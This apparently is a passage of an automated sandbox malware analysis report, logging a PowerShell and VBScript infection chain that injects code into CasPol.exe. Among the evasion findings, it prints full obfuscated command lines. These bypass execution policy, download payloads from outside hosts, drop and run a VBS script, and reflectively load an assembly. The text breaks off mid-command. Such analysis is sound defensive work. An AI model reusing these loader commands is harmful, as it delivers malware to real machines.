                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Delayed program exit found
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0040E54F Sleep,ExitProcess,18_2_0040E54F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,18_2_004198C2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5296Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4448Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6853Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2607Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1464Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 560Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3215Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6534Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 509Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9003Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: foregroundWindowGot 1765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5084Thread sleep count: 6853 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6700Thread sleep count: 2607 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7164Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep count: 1464 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep count: 560 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep count: 3215 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep count: 6534 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7824Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8084Thread sleep count: 232 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8084Thread sleep time: -116000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8088Thread sleep count: 509 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8088Thread sleep time: -1527000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8088Thread sleep count: 9003 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8088Thread sleep time: -27009000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,18_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,18_2_0041B42F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,18_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044D5E9 FindFirstFileExA,18_2_0044D5E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,18_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00406AC2 FindFirstFileW,FindNextFileW,18_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,18_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,18_2_00418C69
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,18_2_00408DA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,18_2_00406F06
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: powershell.exe, 00000003.00000002.1303936513.00000000054C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: mshta.exe, 00000000.00000002.1289334698.00000000056A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\l
                    Source: wscript.exe, 0000000D.00000002.1393834666.0000000005010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
                    Source: powershell.exe, 00000003.00000002.1303936513.00000000054C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000010.00000002.1716425597.00000000073ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
                    Source: powershell.exe, 00000001.00000002.1427293959.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1423686161.0000000007AA5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1424337882.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000012.00000002.3692299440.0000000000C71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: powershell.exe, 00000003.00000002.1302780296.00000000034A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FnsTraceSession", "Stop-DtMSFT_NetEventVmNetworkAdatper.cdxmlWrit
                    Source: CasPol.exe, 00000012.00000002.3692299440.0000000000C71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
                    Source: powershell.exe, 00000003.00000002.1303936513.00000000054C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.1302780296.00000000034A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Vom/fwlink/?LinkID=390791"MSFT_NetEventVmNetworkAdatper.format.ps1xml
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end nodegraph_18-48194
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_0043A65D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,18_2_0041BCE3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00442554 mov eax, dword ptr fs:[00000030h]18_2_00442554
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044E92E GetProcessHeap,18_2_0044E92E
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00434168
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_0043A65D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00433B44
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00433CD7 SetUnhandledExceptionFilter,18_2_00433CD7

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: amsi32_7724.amsi.csv, type: OTHER
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTR
                    Bypasses PowerShell execution policy
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Injects a PE file into a foreign processes
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 6BC008Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe18_2_00410F36
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00418754 mouse_event,18_2_00418754
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENTJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES883E.tmp" "c:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSk